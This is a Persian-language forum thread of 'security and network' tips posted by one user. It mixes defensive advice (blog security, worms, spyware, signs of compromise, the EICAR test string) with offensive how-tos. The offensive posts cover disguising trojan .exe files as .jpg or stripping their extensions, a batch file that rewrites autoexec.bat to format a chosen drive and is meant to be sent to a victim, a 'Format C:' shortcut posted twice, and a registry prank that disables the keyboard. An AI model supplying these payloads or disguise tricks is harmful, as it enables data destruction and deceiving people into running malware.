0

امنیت و شبکه

 
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

امنیت و شبکه

مطالب مهم و کاربری امنیت و شبکه  را در این بخش بخوانید

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

شنبه 7 آذر 1388  11:17 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

hoda

با استفاده از ترفندی که به شما معرفی خواهیم کرد میتوانید بدون نیاز به نرم افزار خاصی و تنها در محیط سایت یاهو و با اندکی تنظیمات ، IP شخصی که برای شما ایمیل فرستاده را بیابید.

بدین منظور:
ابتدا به صفحه ایمیلتان در یاهو بروید و سپس از بالای صفحه سایت گزينه Options را انتخاب کنيد.
سپس به قسمت General Preferences بروید. در صفحه باز شده در بخش Messeges و در قسمت Headers ، تیک گزینه
Show all headers on incoming messages را بزنید. سپس در پایین صفحه بر روی Save کلیک کنید.
حال اگر یکی از ایمیلهای خودتو رو چک کنید در قسمت نام فرستنده میتوانید IP و اطلاعات دیگری از او را مشاهده کنید.

_mooning@yahoo.com

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

شنبه 7 آذر 1388  11:17 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

پیدا کردن اطلاعات یک IP

whois يکی از کارهائيست که بعد از پيدا کردن IP استفاده ميشود whois جهت جمع اوری اطلاعات در مورد يک Ip بکار ميرود با اين کار شما ميتوانيد مشخص کنيد که اين IP متعلق به چه شرکتی ميباشد و در کدام کشور يا شهر می باشد و يا حتی شماره تلفن ها و ادرس ان شرکت و يا حتی ادرس ايميل صاحب شرکت را که بعضی از site ها اين کار را برای ما انجام ميدهند فرض کنيد شما صاحب يک شرکت متوجه شديد که فلان IP در حال انجام کار بر روی IP شرکت شما می باشد حال برای شناسائی مزاحم خود بايد چه کرد برای اينکه به اطلاع مسئول شرکت دارای ان ip بر سانيم که يکی از IP های شما در چنين ساعتی ايجاد مزاحمت کرده البته اين در صورتی مفيد می باشد که آن شرکت به اين مسائل مقيد باشد و شرکتی باشد که IP های استفاده شده توسط هر user را ثبت کند.

بدین منظور کافی است به وب سایت http://www.dnsstuff.com/ بروید و در قسمت WHOIS Lookup ، آدرس IP مورد نظر را وارد کنید و Enter را بزنید. خواهید دید که تمامی مشخصات IP برایتان نمایان میشود.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

شنبه 7 آذر 1388  11:18 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

تبدیل فایل exe به jpg تنها با استفاده از یک ترفند کوچک

برای فهم بیشتر این ترفند شما باید اندکی به هک و تروجان های آن آشنا باشید. مطمئنأ میدانید در صورتی که با استفاده از برنامه های تروجان ساز یک تروجان بسازید ، فرمت این فایل سرور exe. خواهد بود. اما ما قصد داریم تا ترفندی کوچک را به شما آموزش دهیم که با استفاده از آن میتوانید بدون نیاز به نرم افزار خاصی در عین حالی که فرمت فایل exe است اما با فرمت jpg. و یا هر فرمتی که شما دوست دارید نمایش داده شود.

برای این کار:
ابتدا دقت کنید که سیستم شما قابلیت نمایش فرمتهای فایل ها را دارد یا خیر؟ برای فهمیدن این موضوع My Computer را باز کرده و از منوی Tools به Folder Options بروید. سپس تب View را باز کرده و دقت کنید که گزینه Hide extensions for known file types تیک نخورده باشد.
حال سراغ اصل مطلب برویم.
فایل مورد نظر که فرمت exe دارد را بیابید و بر روی آن راست کلیک کرده و Rename را انتخاب کنید. سپس قبل از exe. عبارت jpg. را تایپ نمایید (و یا هر فرمتی که دوست دارید). که به عنوان مثال فایلی با نام naslejavan.exe به شکل naslejavan.jpg.exe در خواهد امد. حال میبایست پس از عبارت jpg. دست خود را بر روی دکمه Space کیبورد نگاه داشته و بیش از 20 بار این کلید را بفشارید. سپسEnter را بزنید. خواهید دید که تنها فرمت jpg. به چشم میخورد و تنها نشانه ای که از exe. به چشم میخورد سه نقطه ای است که در سمت دیگر آیکون وجود دارد و اصلا جلب توجه نمیکند.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

شنبه 7 آذر 1388  11:19 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ترفند هایی برای جلوگیری از هک شدن وبلاگ

همانطور که اطلاع دارید جدیدأ هک شدن وبلاگها توسط هکر ها رایج شده است. به طوری که هر هکر یا گروه هکری کار هک خود را با هک وبلاگ ها آغاز میکند. میتوان گفت وبلاگ نیز یک سایت رایگان است اما آیا امنیت این وبلاگها بر عهده کیست؟ میتوان به اطمینان گفت 99% امنیت وبلاگها در دست صاحبان وبلاگ است. در صورتی که مدیریت یک وبلاگ را بر عهده دارید حتما این مطلب را بخوانید زیرا ترفندهایی بسیار مفید پیرامون جلوگیری از هک شدن وبلاگتان به شما معرفی کرده ایم.

ولی هکر ها چگونه وبلاگهای ما رو هک میکنند؟
1- هک کردن ایمیل صاحب وبلاگ
به طوری که هکر ایمیل صاحب وبلاگ را هک کرده بعد برای ورود به وبلاگ به قسمت فراموش کردن پسورد وبلاگ میرود. در این قسمت باید ایمیل صاحب وبلاگ زده شه تا پسورد وبلاگ به این ایمیل انتقال پیدا کند.پس هکر با در دست داشتن نام وبلاگ و داشتن پسورد ایمیل شما میتواند خیلی راحت به وبلاگتان دست رسی پیدا کند.
2- ایمیل جعلی
حیله دیگر هکر ها فرستادن ایمیل جعلی برای صاحبان وبلاگ است.به گونه ای که به طور دروغ خودشان را صاحب ارائه دهنده سرویس وبلاگشان معرفی میکنند و میخواهند از آنها که پسورد خود را برای آنها ایمیل کنید.
3- استفاده از صفحه های تقلبی
بعضی مواقع به شما آدرسهای نا آشنا پیشنهاد میشود.بعد از باز کردن این آدرس ها صفحه ای شبیه صفحه لاگین (صفحه ورودی به وبلاگ شما که یوزر نیم و پسورد را میخواهد) باز میشود.ولی آیا هر صفحه شبیه به آن صفحه لاگین ما باید مشخصاتمان را وارد نماییم.؟؟؟؟خیر.زیرا امکان دارد این مشخصات ما برای افراد غیر معتمد فرستاده شود.
4- استفاده از باگها
گاهی اوقات سرویس دهنده های وبلاگ نمیتوانند آن طور که باید امنیتشان را تامین کنند برای همین با پیدا شدن چند باگ (حفره امنیتی) راه هک کردن را برای هکر ها باز میکنند. ولی این امر خیلی کم دیده میشود و میتوان گفت امکان چنین اتفاقی خیلی به ندرت دیده میشود.

ولی راههای جلوگیری از هک شدن وبلاگهایمان:
1- در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب انتخاب نمایید .
2- در نگه داشتن ایمیل خود توجه داشته باشید.
3- این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده از شما پسورد وبلاگتان را نمیخواهند.
4- همیشه سعی کنید همه موارد صفحه لاگین(آدرس بار و...)را کاملا چک کرده بعد یوزر نیم و پسورد خودتان را وارد نمایید.
5- سعی کنید از یک پسورد مناسب استفاده کنید.
6- سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.
با استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ خود را تا حد زیادی کاهش داده اید.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

شنبه 7 آذر 1388  11:25 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ساختن راحت یک ویروس شوخی!

امروز شما با ويروس Flicker آشنا ميشويد .البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود.(البته Flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس).Flicker در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوق كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند.و با اين وضع عملا كار با كيبورد امكاپذير نيست. لارم به ذکر است که طریقه غیرفعال کردن این ویروس نیز ذکر شده است.

اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]

"Flags"="127"

[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]

"Flags"="3"


"WindowsEffect"="3"

سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد. حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان بسازيد.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response]


"Flags"="126"

[HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry]

"Flags"="2"

"WindowsEffect"="0"

و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد.
حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند.حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد.

مهم: واضح است كه براي غير فعال كردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبورد شما كماكان غير قابل استفاده است!

لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:10 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ساخت یک ویروس نما!

قصد داریم ترفندی متفاوت را به شما معرفی کنیم که با استفاده از آن میتوانید به راحتی و تایپ یک متن کوتاه در نرم افزار notepad ویروسی با نام Eicar بسازید. اين ويروس در حقيقت يك ويروس نماي استاندارد براي تست آنتي ويروسهاست. لازم به ذکر است اين ويروس يك ويروس واقعي نيست و در حقيقت يك ويروس نما است و فقط براي تست آنتي ويروس شما مثل يك ويروس عمل ميكند. ميتوانيد مطمئن باشيد كه eicar به هيچ وجه به سيستم شما آسيبي نخواهد رساند. براي تكميل توضيحات فوق بايد گفت EICAR مخفف عبارت European Institute for Computer Antivirus Research می باشد.

بدین منظور:
ابتدا Notepad را باز كنيد و عبارت زير را در آن وارد كنيد.
می توانید برای اطمینان و راحتی خودتان از Copy و Paste استفاده كنيد: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
سپس SaveAs را انتخاب و فايل را با پسوند com سيو كنيد يعني با نامي مثل eicar.com
به همین راحتی کار تمام است!

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:11 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ساخت یک ویروس کوچک برای فرمت کردن یک درایو مشخص

این بار قصد داریم برای شما یک ترفند خطرناک را بازگو کنیم که با استفاده از آن میتوانید از طریق Notepad ویندوز یک فایل بسازید و آن را برای شخص مورد نظر بفرستید. کافی است فرد مورد نظر فایل را یکبار اجرا کند و آنگاه یکی از درایوهای کامپیوتر فرد ، که شما آن را تعیین کرده اید فرمت خواهد شد!
بدین منظور:
ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:

@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit

حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال tarfandestan.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.

اما به چند نکته توجه کنید:
عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :c به جای c نام درایو مورد نظر را بنویسید.
دقت هم کنید که ابدأ به روی فایلی که ساخته اید کلیک نکنید ، چرا که آن وقت باید با درایو خودتون خداحافظی کنید!

اما به نظر شما این فایل چگونه کار میکند؟
روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد ' format /autotest c:/q ' را در داخلش جایگزین میکنه ، به همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:12 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ساخت یک ویروس ( تروجان ) ساده ولی خطرناک

ميخوام نوشتن يه ويروس ساده ولي خطرناك رو بهتون ياد بدم. اين ويروس چيز سختي نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات درايو مورد نظر پاک بشه.
اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:12 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

ساخت یک ویروس ( تروجان ) ساده ولی خطرناک

ميخوام نوشتن يه ويروس ساده ولي خطرناك رو بهتون ياد بدم. اين ويروس چيز سختي نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات درايو مورد نظر پاک بشه.
اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه در اون بنويسيد: Format C:/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.

سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي Format C:/autotest بنويسيد Format a:/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:12 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

روشی مطمئن برای مخفی کردن پسوند exe. در تروجان ها

تمامی کسانی که در هک اندکی نیز سر رشته دارند مطمئنأ میدانند وقتی یک تروجان ساخته میشود پسوند آن exe. است. این موضوع میتواند باعث شود که فرد مورد نظر تروجان را دریافت نکند. اکنون قصد داریم یک ترفند بسیار جالب را به شما معرفی کنیم که با استفاده از آن میتوانید این پسوند را کاملا محو سازید ، به نوعی که همچنان همان کارایی را داشته باشد.

بدین منظور:
از منوی Start و سپس All Programs وارد Accessories شده و Wordpad را انتخاب کنید.
پس از باز شدن برنامه Wordpad تروجان مورد نظر را Copy کرده و در درون Paste ، Wordpad نمایید.
حال از منوی بالا وارد Edit>Package Object>Edit Package شوید.
در پنجره باز شده از منوی Edit بر روی Copy Package کلیک کنید.
در پایان وارد یکی از درایو های کامپیوتر شده و راست کلیک کنید و Paste را انتخاب کنید.
فایلی که Paste میشود تروجان جدید شما بدون پسوند exe است.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:13 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

خصوصيات کرمهای شرور

كرمها اصولاً ويروس نيستند با اين وجود تفاوت بين آنها بسيار اندك است و معمولاً در اخبار روزمره آنها را با يكديگر اشتباه مي گيرند. ويروسها يك كامپيوتر منفرد را آلوده مي كنند و سعي نمي كنند به كامپيوتر ديگري راه پيدا كنند اما کرمها بسیار شرور ترند چرا که سعی میکنند به کامپیوترهای دیگر انتقال پیدا کنند. ( مثلاً با اشتراك گذاشتن فايلها بوسيله email يا بوسيله فلاپي ديسك ها). كرمها به شدت علاقه مندند كه فقط خود را در ميان يك شبكه گسترش دهند. آنها به طور خود كار خودشان را به كامپيوترهاي ديگر انتقال مي دهند به علت اينكه انتقال آنها بين كامپيوترها به طور خودكار انجام مي پذيرد سرعت گسترش آنها بسيار سريعتر از ويروسها است. اما همیشه ما زرنگ تر بوده ایم. در این ترفند قصد داریم راه هایی را به شما معرفی کنیم که میتوانید از ورود کرم ها به سیستم تان جلوگیری کنید.

معمولترين راه گسترش يك كرم اين است كه خود را به همه آدرسهاي email اي كه شما در address book خود ليست كرده ايد برساند ، يا outlook شركت مايكروسافت برنامه email اي است كه بيشترين آسيب پذيري را در برابر حمله كرمها دارد ، فقط به اين دليل كه عمومي ترين برنامه است. براي كاهش دادن احتمال آلوده شدن به كرمها شما مي توانيد مراحل زير را اجرا كنيد:

  • هيچ فايل الصاقي ( attachment ) غير منتظره اي را در email هاي خود باز نكنيد ( بخصوص آنهايي را كه شامل پيغامهاي معمول مانند در اين جا فايلي كه شما درخواست كرده ايد وجود دارد. ) هر چند آنها از منابع مطمئني براي شما ارسال شده باشند. براي فرستنده email اي بفرستيد (reply ) و از او سئوال كنيد او واقعاً چنين فايلي براي شما فرستاده است يا نه؟

  • يك آنتي ويروس نصب كنيد و آن را مرتباً up to date كنيد.

  • اگر ممكن است از نرم افزار email اي به غير از Outlook Express استفاده كنيد.

اولین نمونه های كرمي كه به خوبي منتشر شده "Love Letter" نام دارد كه با فرستادن خود به آدرس email اي كه در address book نرم افزار Outlook Express وجود دارند منتشر مي شود به راحتي كپي كردن فايل در كامپيوتر قرباني خود را وارد مي كند و با يك عنوان به صورت "I LOVE YOU" وارد مي شود و پيغام آن به صورت زير است :

"Rindly chek the attached LOVE LETTER coming from me"

بدليل اينكه email از يك فرد شناخته شده براي گيرنده ارسال شده است بسياري از مردم گول مي خورند و كرم در حجم وسيع گسترش پيدا مي كند. اگر چه به كامپيوتر قرباني آسيب وارد مي شود ولي آسيب اصلي به كل شبكه وارد مي شود و همه آن را آلوده مي كند.

اسب تراوا چيز جالبي بنظر مي رسد اما چيزهاي آسيب رسان و كثيفي در بر دارد. و در لباس خدمات مفيد يا پيوستهاي ( attachments ) جذاب در email مثلاً يك screen saver پخش مي شود. آنها فايلهي الصاقي براي شما مي فرستند كه آنقدر براي شما جالب است كه آنها را براي دوستانتان مي فرستيد. در حاليكه آثار مخرب آن پنهان بوده با تأخير عمل مي كند بنابراين شما نمي دانيد چيزي كه در حال فرستادن آن هستيد يك فايل خطرناك است.

در مواقع ديگر اين كرمها تكثير مي شوند مانند يك كرم اينترنتي و خود را به صورت اتوماتيك به كامپيوترهاي ديگر مي رسانند و معمولاً از Outlook Express استفاده مي كنند.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:13 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

چند توصیه برای پیشگیری از آلوده شدن رایانه

علاوه بر استفاده خوب و مؤثر از آنتی ویروس ها، کاربران اینترنت برای کاهش خطرات ناشی از بدافزارها باید برخی عادت های اینترنتی خود را نیز کنار بگذارند. این واقعیت که نود درصد کامپیوتر ها آلوده به Spyware هستند نشان دهنده میزان تأپیر گذاری و سماجت بیش از اندازه این نوع بد افزار است که از هر رخنه و سوراخ کوچکی برای ورود به کامپیوتر استفاده می کند.در اینجا قصد داریم چندین ترفند بسیار مفید را برای جلوگیری از نفوذ Spyware ها به کامپیوتر شما معرفی کنیم.

به همین دلیل تنها راه پیشگیری از ابتلای به آنها محافظت تمام عیار از کامپیوتر است. پایه و اساس مقابله مؤثر با spyware ها استفاده از راه حل های مناسب تکنیکی است؛ شیوه هایی که در آن پیشگیری و درمان هر دو لحاظ شده باشد. با این وجود مسئله دیگری که تأثیر مستقیم و قابل توجهی در احتمال آلوده شدن سیستم دارد عادت های کاربران اینترنتی است. با در نظر گرفتن این موضوع راهکار های عملی زیر توصیه می شود تا کاربران بیش از پیش کامپیوترشان را در برابر این نوع بدافزار محافظت کنند:
• از آنجا که بسیاری از spyware ها با بهره گیری از بخش های آسیب پذیر نرم افزارها وارد سیستم می شوند، نصب آخرین وصله های امنیتی نرم افزار که معمولا در سایت اینترنتی مربوط به آن در اختیار کاربران قرار می گیرد، بسیار ضروری است.
• قبل از نصب و استفاده از نرم افزار شرایط کار با آن را به دقت بخوانید. برخی از نرم افزار های رایگان یا مدت دار همراه با نرم افزار مربوطه انواع مختلفی از spyware ها را نیز روی سیستم نصب می کنند. (در ازای استفاده مجانی از نرم افزار این spyware ها اطلاعات قابل استفاده کاربر را برای شرکت سازنده ارسال می کنند.)
• هنگام وارد کردن آدرس اینترنتی در مرورگر خود کاملأ دقت کنید. بسیاری از سازندگان spyware ها از صفحات اینترنتی با آدرس مشابه سایت های مشهور برای قالب کردن بدافزار های خود استفاده می کنند. (googkle.com یکی از مثال های واقعی این نوع سوء استفاده است.)
• از برنامه های غیر قانونی که معمولا به صورت رایگان در اینترنت ارائه می شود استفاده نکنید؛ همین طور از برنامه های ارائه دهنده موسیقی و فیلم مجانی. صرف نظر از غیر قانونی بودن آنها، این برنامه ها معمولآ سرشار از انواع بدافزار ها از جمله spyware ها هستند.
• از سایت های زیرزمینی دوری کنید. (سایت هایی که به داونلود غیرقانونی فایلها، ابزار و روش های هک کردن و ... مربوط می شود.) نه تنها بسیاری از این سایت ها در واقع فقط به منظور داونلود اتوماتیک spyware ها طراحی می شوند، بلکه ممکن است حاوی نرم افزار هایی باشند که پس از نصب شدن روی سیستم انواع و اقسام بدافزار را راهی کامپیوتر کند. لوئیس کورونس، مدیر PandaLabs در این باره می گوید: برای محافظت در برابر spyware ها مهمترین مسئله این است که آنتی ویروس مناسبی داشته باشید که بتواند spyware های شناخته شده و ناشناخته را از کار بیندازد. اما یادتان باشد که هیچ آنتی ویروسی بدون خطا نیست و به همین دلیل شیوه استفاده کاربران از اینترنت نیز می تواند در کاهش شانس بدافزارها برای نفوذ به سیستم مؤثر باشد. همان طور که هیچ راننده عاقلی، هر چقدر هم که سیستم های امنیتی اتومبیلش پیشرفته باشد، با سرعت 200 کیلومتر در ساعت یک دفعه دور کامل نمی زند، هیچ کاربر با هوشی با تصور امن بودن سیستمش، در سایت های آلوده و خطرناک گشت و گذار نمی کند.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:14 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

چگونه بفهميم كه هك شده ايم؟

چگونه بفهمیم که هک شده ایم؟ این سوالی است که روزانه بسیاری از افراد از خودشان میپرسند. یا پس از به وجود آمدن مشکلی در سیستم خود فکر هک شدن سیستم به ذهنشان خطور میکند. اما فهمیدن این که آیا نفوذگر توانسته به سیستم ما دسترسی پیدا کند برای خود نشانه هایی دارد. تا دیر نشده این ترفند را مطالعه کرده و در صورت داشتن این نشانه ها سیستم خود را ایمن کنید.

* هنگام كار با اينترنت مانيتور شما ناگهان خاموش مى شود يا تصوير آن وارونه مى شود ياسيستم شما به طور ناگهانى خاموش مى شود و يا Restart مى كند.
* شخصى با ID شما در مسنجر Yahoo با دوستانتان صحبت كرده و خودش را به جاى شما جا زده.
* CD-Rom شما خود به خود باز و بسته مى شود.
و ده ها مورد عجيب ديگر كه تابحال نديده بوديد و چند وقتى است كه با آنها دست به گريبان شديد...
در اين موارد احتمال هك شدن وجود دارد . در واقع نفوذگر با نصب نرم افزار هك بر روى دستگاه شما قادر خواهد بود اين كارها را انجام دهد . البته در بعضى موارد نيز احتمال دارد سيستم شما دچار خرابى سخت افزارى يا نرم افزارى شده باشد.
ولى هرگز اين مورد را از نظر نبايد دور داشت كه در بعضى موارد نفوذگر علاقه اى به خودنمايى ندارد . او بدون سر و صدا اطلاعات كسب مى كند و شايد دنبال پسوردها ، شماره تلفنها ، كارتهاى اعتبارى و يا موارد ديگر باشد.
يك مورد خطرناك تر هم وجود دارد و آن مورد اين است كه نفوذگر از دستگاه شما به عنوان طعمه استفاده كند و از طريق آن به ساير كامپيوترها حمله كند و به اين طريق رد خود را از بين ببرد.
اگر حملات وى اثر بخش باشد ممكن است شما به عنوان يك هكر دچار دردسرهاى قانونى شويد ! حتى بسته به مكانهايى كه هكر اصلى به آنها حمله كرده ممكن است شما واقعا" به دردسر بدى بيفتيد.
پس بهتر است هرچه زودتر خود را در اين زمينه تجهيز كنيد تا هرگز طعمه قرار نگيريد.

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:14 AM
تشکرات از این پست
zarei6703
zarei6703
کاربر برنزی
تاریخ عضویت : آذر 1388 
تعداد پست ها : 321
محل سکونت : اصفهان

پاسخ به:امنیت و شبکه

چگونگی دریافت کرک ها و تشخیص ویروسی بودن آنها

ممکن است شما نیز تا به حال در جستجوی کرک برنامه ها و بازی ها بوده اید ، اما متاسفانه سایتهای بسیاری وجود دارد که از این نكته برای فریب کاربران استفاده میکنند و برنامه های آلوده به ویروس خود را به جای کرک های برنامه ها به مردم تحویل میدهند. در این ترفند قصد داریم روشهای مفیدی را معرفی کنیم که میتوانید این کرکهای آلوده را که حتی بسیاری از آنتی ویروس ها در تشخیص آنها ناکام هستند ، خودتان تشخیص دهید.

برای استفاده از کرک این سایتها باید به موارد زیر توجه کرد:
1-حتما قبل از باز کردن فایل آنرا با Antivirus خود چک کنید. (ترجیحا Kaspersky ) توجه داشته باشید که آنتی ویروستان داخل فایلهای فشرده مثل zip، rar و ... و نیز فایلهای Exe selfextract را باید چک کند.


2-دستورالعمل داخل فایل *.nfo را بخوانید(به جای * نام فایلتان است!) فایلهای مورد نیاز (که غالب اوقات ویروسی نیستند) در آن ذکر شده است. بنابراین فایلهای دیگر را هر گز اجرا نکنید. (این فایل را باید با notepad یا نرم افزارهای مشابه آن باز کرد)


3-فایلهایی با نامهای crack.exe، run.exe، NiTROUS.exe و... غالبا ویروسی هستند. سعی کنید آنها را تا مطمئن نشدید (مثلا از طریق آنتی ویروس) اجرا نکنید. توصیه می کنم آنها را بلافاصله پاک کنید!

عشق یعنی در تولا سوختن              حق شناسی را از سگ اموختن

پنج شنبه 12 آذر 1388  10:15 AM
تشکرات از این پست
دسترسی سریع به انجمن ها